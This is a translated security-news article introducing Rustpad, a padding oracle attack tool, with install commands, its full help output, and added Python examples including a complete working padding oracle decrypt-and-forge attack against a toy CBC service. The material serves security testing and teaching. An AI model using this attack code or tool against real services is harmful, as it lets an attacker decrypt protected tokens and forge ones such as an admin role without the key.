
Rustpad: a powerful multi-threaded padding oracle attack tool

source link: https://www.freebuf.com/articles/database/320330.html
Alpha_h4ck 2022-01-19 22:37:30


About Rustpad

Rustpad is a powerful multi-threaded padding oracle attack tool and the successor to PadBuster, building on that earlier tool's design. It is written in Rust and, given a padding oracle, can decrypt arbitrary cipher text or encrypt arbitrary plain text without knowing the encryption key.

1. Decrypt arbitrary cipher text

2. Encrypt arbitrary plain text

3. Multi-threading at both block level and byte level

4. Advanced real-time interactive user interface

5. No-TTY support, so input and output can be piped

6. Progress bar and automatic retries

7. Smart detection of the cipher text encoding; supports hex, base64 and base64url

8. Written in 100% safe Rust
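Feature 7 hides a real sharp edge, illustrated here with an added Python example (it is not Rustpad's code and makes no claim about how Rustpad's own detector is implemented; the function and constant names are the editor's): every hex string is also syntactically valid base64, base64 and base64url are indistinguishable unless one of `+`, `/`, `-` or `_` occurs in the token, and the token usually arrives URL-encoded from a query string or cookie, which is why a tool like this also needs a `--no-url-encode` switch and an explicit `--encoding` override.

```python
# Added example (not rustpad code): what an "--encoding auto" step has to do
# before a padding-oracle tool can start forging blocks.  Order matters:
# every hex string is also syntactically valid base64, and base64url differs
# from base64 only in '-'/'_' versus '+'/'/', so a token without any of those
# four characters is genuinely ambiguous and may need an explicit --encoding.
import base64
import binascii
import re
import urllib.parse

HEX = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
B64URL = re.compile(r"^[A-Za-z0-9_-]+={0,2}$")


def _b64(s, decoder):
    """Decode with '=' padding restored; None if the data is not valid base64."""
    try:
        return decoder(s + "=" * (-len(s) % 4))
    except binascii.Error:
        return None


def detect_and_decode(token, url_decode=True):
    """Return (encoding, raw_bytes) for a cypher text lifted from a request.

    unquote() rather than unquote_plus() is used so a literal '+' inside base64
    survives, while %2B and %3D from a URL-encoded value are restored first."""
    s = (urllib.parse.unquote(token) if url_decode else token).strip()
    if HEX.match(s):
        return "hex", bytes.fromhex(s)
    if B64.match(s):
        raw = _b64(s, lambda x: base64.b64decode(x, validate=True))
        if raw is not None:
            return "base64", raw
    if B64URL.match(s):
        raw = _b64(s, base64.urlsafe_b64decode)
        if raw is not None:
            return "base64url", raw
    raise ValueError(f"cannot determine encoding of {token!r}")


def encode(raw, encoding, url_encode=True):
    """Inverse: put a forged cypher text back into the oracle's own format."""
    if encoding == "hex":
        out = raw.hex()
    elif encoding == "base64":
        out = base64.b64encode(raw).decode()
    elif encoding == "base64url":
        out = base64.urlsafe_b64encode(raw).decode().rstrip("=")
    else:
        raise ValueError(f"unknown encoding {encoding!r}")
    return urllib.parse.quote(out, safe="") if url_encode else out
```

A token such as `deadbeef` is reported as hex even though it is also valid base64, and a base64url token without `-` or `_` is reported as plain base64; both are correct decodings of the bytes, but re-encoding them in the wrong alphabet can make the target reject the forged block, which is the situation the `-e` flag exists for.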

Download and installation

Researchers can clone the project source with the following command:

git clone https://github.com/Kibouo/rustpad.git

Arch Linux (AUR, v1.7.3-1)

yay -Syu rustpad

Kali / Debian (.deb, v1.7.3; download the package from the project's GitHub releases first)

apt install ./rustpad.deb

Other platforms (crates.io, v1.7.3)

cargo install rustpad

Testing for a padding oracle with Rustpad is straightforward: the tool needs only four pieces of information to start:

1. The target oracle (--oracle)

2. The cipher text to decrypt (--decrypt)

3. The block size (--block-size)

4. The oracle type (web / script)

Tool help

; rustpad --help
rustpad
Multi-threaded Padding Oracle attacks against any service.

USAGE:
    rustpad [OPTIONS] --block-size <block_size> --decrypt <decrypt> --oracle <oracle> <SUBCOMMAND>

OPTIONS:
    -B, --block-size <block_size>
            Block size used by the cypher [possible values: 8, 16]

    -D, --decrypt <decrypt>
            Original cypher text, received from the target service, which is to be decrypted

        --delay <delay>
            Delay between requests within a thread, in milliseconds [default: 0]

    -e, --encoding <encoding>
            Specify encoding used by the oracle to encode the cypher text [default: auto]  [possible values: auto, base64, base64url, hex]

    -E, --encrypt <encrypt>
            Plain text to encrypt. Encryption mode requires a cypher text to gather necessary data

    -h, --help
            Prints help information

        --no-cache
            Disable reading and writing to the cache file

    -n, --no-iv
            Cypher text does not include an Initialisation Vector

        --no-url-encode
            Disable URL encoding and decoding of cypher text

    -O, --oracle <oracle>
            The oracle to question with forged cypher texts. This can be a URL or a shell script.
            See the subcommands `web --help` and `script --help` respectively for further help.

    -o, --output <output>
            File path to which log output will be written

    -t, --threads <threads>
            Amount of threads in the thread pool

    -V, --version
            Prints version information

    -v, --verbose
            Increase verbosity of logging

SUBCOMMANDS:
    web       Question a web-based oracle
    script    Question a script-based oracle

Web mode

In web mode the target oracle lives on the web: it is a web server reached through a URL.

For the attack to succeed, Rustpad submits cipher text with deliberately incorrect padding, analyses how the oracle responds, and calibrates itself automatically to that behaviour. By default the calibration looks at the response status; when correct and incorrect padding produce the same status code and differ only in the body, pass --consider-body so the body and content length are compared as well.

; rustpad web --help
rustpad-web
Question a web-based oracle

USAGE:
    rustpad --block-size <block_size> --decrypt <decrypt> --oracle <oracle> web [OPTIONS]

OPTIONS:
    -c, --consider-body
            Consider the response body and content length when determining the web oracle's response to (in)correct padding

    -d, --data <data>
            Data to send in a POST request

        --delay <delay>
            Delay between requests within a thread, in milliseconds [default: 0]

    -e, --encoding <encoding>
            Specify encoding used by the oracle to encode the cypher text [default: auto]  [possible values: auto, base64, base64url, hex]

    -h, --help
            Prints help information

    -H, --header <header>...
            HTTP header to send

    -k, --insecure
            Disable TLS certificate validation

    -K, --keyword <keyword>
            Keyword indicating the location of the cypher text in the HTTP request. It is replaced by the cypher text's value at runtime [default: CTEXT]

        --no-cache
            Disable reading and writing to the cache file

    -n, --no-iv
            Cypher text does not include an Initialisation Vector

        --no-url-encode
            Disable URL encoding and decoding of cypher text

    -o, --output <output>
            File path to which log output will be written

    -x, --proxy <proxy>
            Proxy server to send web requests over. Supports HTTP(S) and SOCKS5

        --proxy-credentials <proxy_credentials>
            Credentials to authenticate against the proxy server with [format: <user>:<pass>]

    -r, --redirect
            Follow 302 Redirects

    -t, --threads <threads>
            Amount of threads in the thread pool

    -T, --timeout <timeout>
            Web request timeout in seconds [default: 10]

    -A, --user-agent <user_agent>
            User-agent to identify with [default: rustpad/<version>]

    -v, --verbose
            Increase verbosity of logging

Indicate the cypher text's location! See `--keyword` for clarification.

Script mode

Script mode is intended for power users and CTF players who can supply a runnable script: the target oracle is a local shell script.

A script lets you test a local oracle or a more unusual service, and it is also the way to customise or extend Rustpad's behaviour.

; rustpad script --help
rustpad-script
Question a script-based oracle

USAGE:
    rustpad --block-size <block_size> --decrypt <decrypt> --oracle <oracle> script [OPTIONS]

OPTIONS:
        --delay <delay>
            Delay between requests within a thread, in milliseconds [default: 0]

    -e, --encoding <encoding>
            Specify encoding used by the oracle to encode the cypher text [default: auto]  [possible values: auto, base64, base64url, hex]

    -h, --help
            Prints help information

        --no-cache
            Disable reading and writing to the cache file

    -n, --no-iv
            Cypher text does not include an Initialisation Vector

        --no-url-encode
            Disable URL encoding and decoding of cypher text

    -o, --output <output>
            File path to which log output will be written

    -t, --threads <threads>
            Amount of threads in the thread pool

    -v, --verbose
            Increase verbosity of logging

Script must respond with exit code 0 for correct padding, and any other code otherwise. Cypher text is passed as the 1st argument.
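The script contract just quoted, together with the claim in the introduction that a padding oracle alone suffices to decrypt arbitrary cipher text and encrypt arbitrary plain text, in one added Python example. It is not Rustpad's or PadBuster's code and everything in it is constructed for illustration: the block cipher is a deliberately insecure 4-round SHA-256 Feistel network standing in for AES so the file runs offline, and the key, the sample plaintexts and the choice of hex for argv[1] are assumptions. Run it without arguments to watch `oracle_decrypt` and `oracle_encrypt` recover and forge data using nothing but the yes/no answer of `padding_ok`; saved as `oracle.py` and made executable, the same file satisfies the script-mode contract, so `rustpad -B 16 -O ./oracle.py -D <hex cypher text> script` can be pointed at it (assuming Rustpad hands the script its forged cypher texts in the same encoding it detected for `-D`).

```python
"""Toy CBC service with a padding oracle, the attack rustpad automates against it,
and a script-mode oracle entry point.  Added example, not rustpad's code.  The block
cipher is a 4-round SHA-256 Feistel network (NOT secure) so the file runs offline;
it stands in for AES, which the attack never needs to know."""
import hashlib, os, sys

BLOCK = 16
KEY = b"example-key-1234"  # constructed secret; the attacker never sees it

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _feistel(key, block, rounds):
    """16-byte keyed permutation; decryption is the same walk with rounds reversed."""
    l, r = block[:8], block[8:]
    for i in rounds:
        l, r = r, xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return r + l

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, padded, iv=None):
    prev = iv or os.urandom(BLOCK)
    out = [prev]  # IV travels as the first block, as rustpad assumes without -n
    for i in range(0, len(padded), BLOCK):
        prev = _feistel(key, xor(padded[i:i + BLOCK], prev), range(4))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(xor(_feistel(key, cur, reversed(range(4))), prev)
                          for prev, cur in zip(blocks, blocks[1:])))

def padding_ok(ct):
    """The oracle: does the service accept this cypher text's padding?"""
    try:
        cbc_decrypt(KEY, ct)
        return True
    except ValueError:
        return False

def intermediate(oracle, target):
    """Recover D_K(target) byte by byte with oracle queries only.  Positions are
    serial within a block, but blocks are independent: that is rustpad's parallelism."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padval  # already-known bytes now decrypt to padval
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # 0x01 is not the only accepted ending (0x02 0x02 also passes):
                # disturb the byte before it and require the oracle to still agree.
                forged[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(forged) + target)
                forged[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted a guess; not a padding oracle?")
    return bytes(inter)

def oracle_decrypt(oracle, ct):
    """rustpad --decrypt: P_i = D_K(C_i) XOR C_(i-1), with C_0 being the IV."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(xor(intermediate(oracle, cur), prev)
                          for prev, cur in zip(blocks, blocks[1:])))

def oracle_encrypt(oracle, plaintext):
    """rustpad --encrypt: fix the last block, then choose each earlier block so
    the CBC XOR yields the wanted plaintext; the block chosen last is the IV."""
    pt = pad(plaintext)
    blocks = [bytes(BLOCK)]
    for i in range(len(pt) - BLOCK, -1, -BLOCK):
        blocks.insert(0, xor(intermediate(oracle, blocks[0]), pt[i:i + BLOCK]))
    return b"".join(blocks)

if __name__ == "__main__":
    if len(sys.argv) > 1:  # script-mode contract: argv[1] is the hex cypher text, exit 0 iff padding is correct
        try:
            ok = padding_ok(bytes.fromhex(sys.argv[1]))
        except ValueError:
            ok = False
        sys.exit(0 if ok else 1)
    ct = cbc_encrypt(KEY, pad(b"user=guest;role=user"))
    print(oracle_decrypt(padding_ok, ct))
    print(cbc_decrypt(KEY, oracle_encrypt(padding_ok, b"user=admin;role=admin")))
```

Two details matter in practice. The extra query on the last byte of each block guards against the classic false positive where a guess produces a valid 0x02 0x02 ending rather than 0x01; skipping it yields wrong bytes on roughly one block in 256. And because each block's intermediate value depends only on that block and the oracle, every block can be attacked at the same time, which is the block-level parallelism in the feature list; within a block the bytes must be recovered from the last one backwards, so byte-level parallelism can only spread the 256 candidate guesses for one position across threads.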

Planned features

1. Tab completion

2. Smart URL parsing

3. Advanced calibration

4. Automatic block size detection

5. Smaller Linux binaries

6. .NET URL token encoding

Rustpad on GitHub: https://github.com/Kibouo/rustpad

https://github.com/AonCyberLabs/PadBuster

https://en.wikipedia.org/wiki/Padding_oracle_attack

Author: Alpha_h4ck. Reposts must credit FreeBuf.COM.

# vulnerability discovery # padding oracle # vulnerability management
